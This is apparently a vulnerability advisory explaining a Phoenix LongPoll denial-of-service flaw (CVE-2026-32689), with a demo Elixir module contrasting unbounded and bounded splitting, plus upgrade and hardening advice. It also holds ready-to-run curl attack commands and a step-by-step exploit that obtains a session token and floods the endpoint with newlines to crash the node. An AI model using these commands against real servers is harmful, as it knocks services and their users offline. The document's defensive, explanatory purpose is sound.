How CVE-2026-32689 works (technical breakdown)
- The flaw lives in Phoenix's `LongPoll` transport, which handles HTTP POST requests carrying the `Content-Type: application/x-ndjson` header.
- Inside `Phoenix.Transports.LongPoll.publish/4`, the incoming NDJSON body is split into a list with `String.split(payload, "\n")`, with no limit on the number of resulting elements.
- An attacker can therefore send a body that consists entirely of newline bytes. Every `\n` produces one more element, so the amplification is 1:1: a 1 MB payload yields roughly 1 million empty binaries, and an 8 MB payload roughly 8.4 million.
- After the split, `Enum.map` walks the list and immediately builds a second list of the same length, doubling the already excessive memory footprint.
- The split list and the mapped list are live at the same time, so the transport process's heap keeps growing until the BEAM can no longer satisfy an allocation and the VM aborts.
- The node crashes, terminating all active LiveView sessions and taking the whole Phoenix instance offline.
- No application-level authentication is required. The POST endpoint does expect a transport session token, but any client obtains one by issuing an unauthenticated GET to the same long-poll endpoint with an acceptable `Origin` header.
- The endpoint is public by design: long-poll has been enabled by default for newly generated Phoenix projects since version 1.7.11.
- A handful of concurrent requests are enough to exhaust memory, which makes the attack cheap and practical.
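The unbounded split described above, placed next to a bounded variant, as an added example that is not Phoenix's own code and not the patch. The module name, the function names and the `@max_messages` / `@max_body_bytes` limits are assumptions chosen for illustration; `Jason` is referenced because it is the JSON library a generated Phoenix project ships with.

```elixir
# Added example, not Phoenix's own code: the unbounded split described above
# next to a bounded variant. The module name, function names and the
# @max_messages / @max_body_bytes limits are assumptions for illustration.
defmodule LongPollSplitDemo do
  @max_messages 100
  @max_body_bytes 64 * 1024

  # Vulnerable pattern: every "\n" in the body becomes a list element, and
  # Enum.map then materialises a second list of the same length while the
  # first one is still live.
  def publish_unbounded(body) when is_binary(body) do
    body
    |> String.split("\n")
    |> Enum.map(&decode_line/1)
  end

  # Hardened pattern: refuse oversized bodies before touching them, then cap
  # how many pieces the split may produce. With `parts:` the last element
  # holds the unsplit remainder as a sub-binary, so 8 MB of newlines yields
  # at most max + 1 binaries instead of 8.4 million.
  def publish_bounded(body, max \\ @max_messages) when is_binary(body) do
    if byte_size(body) > @max_body_bytes do
      {:error, :body_too_large}
    else
      parts = String.split(body, "\n", parts: max + 1)

      # A non-empty (max + 1)-th piece means more than `max` lines were sent
      # (a well-formed body of exactly `max` lines ends in an empty piece).
      if length(parts) > max and List.last(parts) != "" do
        {:error, :too_many_messages}
      else
        {:ok, parts |> Enum.reject(&(&1 == "")) |> Enum.map(&decode_line/1)}
      end
    end
  end

  # Number of list elements the unbounded path creates for `n` newline bytes:
  # n + 1, i.e. the 1:1 amplification plus one trailing empty piece.
  def amplification(n) when is_integer(n) and n >= 0 do
    n |> newlines() |> String.split("\n") |> length()
  end

  # A constructed attack body of `n` newline bytes.
  def newlines(n), do: :binary.copy("\n", n)

  # Jason is Phoenix's default JSON library; empty lines decode to nil.
  defp decode_line(""), do: nil
  defp decode_line(line), do: Jason.decode!(line)
end
```

`LongPollSplitDemo.amplification(1_000_000)` returns `1_000_001`, which is the list the vulnerable path allocates for a 1 MB body. `publish_bounded(newlines(1_000_000))` returns `{:error, :body_too_large}` at the byte check; a body of 200 newlines passes the byte check but returns `{:error, :too_many_messages}` because the 101st piece is the non-empty remainder, while a legitimate `~s({"a":1}\n{"b":2}\n)` returns `{:ok, [%{"a" => 1}, %{"b" => 2}]}`. The two limits are deliberate: the byte cap stops the work before any split, and the `parts:` cap keeps the split itself bounded even if the byte cap is raised later.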
DailyCVE form
Platform: Phoenix
Version: 1.7.0-1.7.21, 1.8.0-1.8.5
Vulnerability: Unbounded memory allocation
Severity: High (CVSS 8.2-8.7)
Date: 2026-05-05
Prediction: Patch available (2026-05-05)
Analytics under “What Undercode Say”
Confirm long-poll is enabled (typical config):
grep -rn "longpoll:" config/ lib/
Simulate the amplification attack (conceptual; the long-poll transport of a socket mounted at `/live` is served at `/live/longpoll`, and the POST still needs the session token described under Exploit):
curl -X POST 'http://target/live/longpoll?vsn=2.0.0' \
  -H 'Content-Type: application/x-ndjson' \
  --data-binary @<(yes '' | head -n 1000000)   # 1 million newlines, about 1 MB
Exploit
1. Obtain a transport session token via an unauthenticated GET (the `Origin` value must satisfy the endpoint's `check_origin` setting):
   `curl -i 'http://target/live/longpoll?vsn=2.0.0' -H 'Origin: http://attacker.com'`
2. Extract the `"token"` from the `phx:session` event in the response.
3. Send a POST with `Content-Type: application/x-ndjson` and a body filled with `\n` bytes, presenting the obtained token.
4. Watch memory usage spike and the node crash within seconds.
Protection from this CVE
- Upgrade to Phoenix 1.7.22 or 1.8.6 (or any later patched release).
- Otherwise, disable the long-poll transport in every `Phoenix.Socket` declaration:
  socket "/live", Phoenix.LiveView.Socket, websocket: true, longpoll: false
- If long-poll is required, apply network-level mitigations in front of the application (Phoenix dispatches socket paths straight to the transport handler, so endpoint plugs do not see these requests):
  - Cap the request body size for the long-poll path (e.g., `client_max_body_size` in nginx).
  - Enforce strict rate limiting on the long-poll endpoint.
  - Deploy a Web Application Firewall (WAF) rule that rejects NDJSON bodies consisting mostly of newline characters.
Impact
Denial of Service (crash) of the entire Phoenix node, affecting all connected users and services.
No application-level authentication required: any remote attacker who can reach the long-poll endpoint can obtain a transport session token and trigger the DoS.
Low-resource attack: a single HTTP request of a few megabytes produces millions of list entries, causing memory exhaustion in seconds.
Widespread exposure: long-poll is enabled by default for new Phoenix projects since 1.7.11, so many production deployments are vulnerable unless explicitly hardened.
No data breach or integrity loss: the impact is purely availability (CIA triad: Availability loss only).
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

